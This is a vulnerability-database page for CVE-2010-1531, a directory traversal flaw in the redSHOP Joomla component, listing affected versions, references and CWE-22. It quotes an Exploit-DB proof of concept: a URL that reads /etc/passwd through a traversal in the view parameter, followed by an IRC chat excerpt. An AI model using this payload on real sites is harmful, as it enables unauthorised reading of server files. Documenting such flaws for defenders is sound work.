CVE-2010-1531
high
CVSS v3
—
CVSS v4 NEW
—
VIR risk
8.5
Description
Directory traversal vulnerability in the redSHOP (com_redshop) component 1.0.x for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the view parameter to index.php.
Predictions
Exploit likelihood
20%
Patch ETA
—
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or — if you've already worked around this in production — publish your fix to the community-verified tier.
✚ Propose a mitigation on Community → Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
Joomla! Component redSHOP 1.0 - Local File Inclusion
======================================================================================================================
[o] Joomla Component redSHOP Local File Inclusion Vulnerability
Software : com_redshop version 1.0.x [ commercial ]
Vendor : http://redcomponent.com/
Author : NoGe
Contact : noge[dot]code[at]gmail[dot]com
Blog : http://evilc0de.blogspot.com/
Home : http://antisecurity.org/
======================================================================================================================
[o] Exploit
http://localhost/[path]/index.php?option=com_redshop&view=[LFI]
[o] PoC
http://localhost/index.php?option=com_redshop&view=../../../../../../../../../../../../../../../etc/passwd%00
======================================================================================================================
[o] Greetz
Vrs-hCk OoN_BoY Paman zxvf Angela Zhang aJe martfella pizzyroot
H312Y yooogy mousekill }^-^{ noname matthews s4va stardustmemory
skulmatic OLiBekaS ulga Cungkee k1tk4t str0ke
======================================================================================================================
[o] Iklan Layanan Masyarakat
-irc.******.net- *** Notice -- ander used SAJOIN to make wishnusakti join #channel
<Jack> wew
<Jack> ngapaen lu bedua di sini?
<Jack> ck ck ck
<@ander> kegiatan mafia
<@wishnusakti> belajar broo ;))
<@wishnusakti> nubi nih :(
<Jack> sama dunk bro
<Jack> aq ikut yak
<Jack> mohon bimbingan na sesepuh
<@wishnusakti> tuhh aku di ajarin ma ander-wear kok
<@wishnusakti> minta ma dia brooo
<Jack> ok bro
<Jack> bro ander-wear.. ajarin dunk
<@wishnusakti> jangan manggil gitu
<@wishnusakti> kamu di plorotin celananya nanti broo =))
<Jack> jadi apa dong?
<@wishnusakti> ander ku sayang :*
<~zxvf> [06:27] * ~ander lagi dengerin [Akon - Right Now (Na Na Na)] © [nob0dy] <=- kayak nya lg senenQ dia
<&pizzy> lagi kasmaran dia
<&NoGe> lg berbunga² tuh
<zxvf> icic
ouw ouw kamu ketauan... wkakwakwkakwkwakwak... :p
======================================================================================================================Application impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| redcomponent | com_redshop | 1.0 | |
| redcomponent | com_redshop | 1.0.1 | |
| redcomponent | com_redshop | 1.0.2 | |
| redcomponent | com_redshop | 1.0.3 | |
| redcomponent | com_redshop | 1.0.4 | |
| redcomponent | com_redshop | 1.0.5 | |
| redcomponent | com_redshop | 1.0.6 | |
| redcomponent | com_redshop | 1.0.7 | |
| redcomponent | com_redshop | 1.0.8 | |
| redcomponent | com_redshop | 1.0.9 | |
| redcomponent | com_redshop | 1.0.10 | |
| redcomponent | com_redshop | 1.0.11 | |
| redcomponent | com_redshop | 1.0.12 | |
| joomla | joomla\! | | |
References
- http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt
- http://redcomponent.com/redshop/redshop-changelog
- http://secunia.com/advisories/39343
- http://www.exploit-db.com/exploits/12054
- http://www.osvdb.org/63535
- http://www.securityfocus.com/bid/39206
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57512
- http://packetstormsecurity.org/1004-exploits/joomlaredshop-lfi.txt
- http://redcomponent.com/redshop/redshop-changelog
- http://secunia.com/advisories/39343
- http://www.exploit-db.com/exploits/12054
- http://www.osvdb.org/63535
- http://www.securityfocus.com/bid/39206
- https://exchange.xforce.ibmcloud.com/vulnerabilities/57512
CWEs
CWE-22
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.